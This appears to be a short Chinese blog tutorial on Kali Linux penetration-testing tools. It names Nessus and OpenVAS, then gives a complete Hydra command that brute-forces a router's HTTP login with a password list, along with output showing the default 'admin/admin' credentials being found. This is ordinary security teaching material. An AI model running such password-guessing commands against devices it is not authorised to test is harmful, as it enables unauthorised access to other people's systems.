Kali linux渗透测试常用工具汇总2-渗透攻击

渗透攻击的思路一般是扫描漏洞，然后利用不同的漏洞，才有针对的渗透攻击。

 

漏洞扫描的工具有Nessus,该工具可同时在本地或远端遥控，对系统的漏洞分析扫描。Nessus通过新建扫描策略，并添加对应的插件，便可以对系统漏洞进行扫描。

另一个漏洞扫描工具是OpenVAS,在这里不做说明。

 

上面说明漏洞扫描，下面说下渗透攻击常用的工具Hydra和Medusa。

举个破解路由器登录密码的例子。

root@alexknight:~# hydra  -l admin -P /tmp/tt.txt -f -V -e nsr -s 80 -t 1  192.168.1.1 http-get
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-09 22:19:37
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] 1 task, 1 server, 7 login tries (l:1/p:7), ~7 tries per task
[DATA] attacking service http-get on port 80
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "admin" - 1 of 7 [child 0]
[80][www] host: 192.168.1.1   login: admin   password: admin
[STATUS] attack finished for 192.168.1.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-09 22:19:38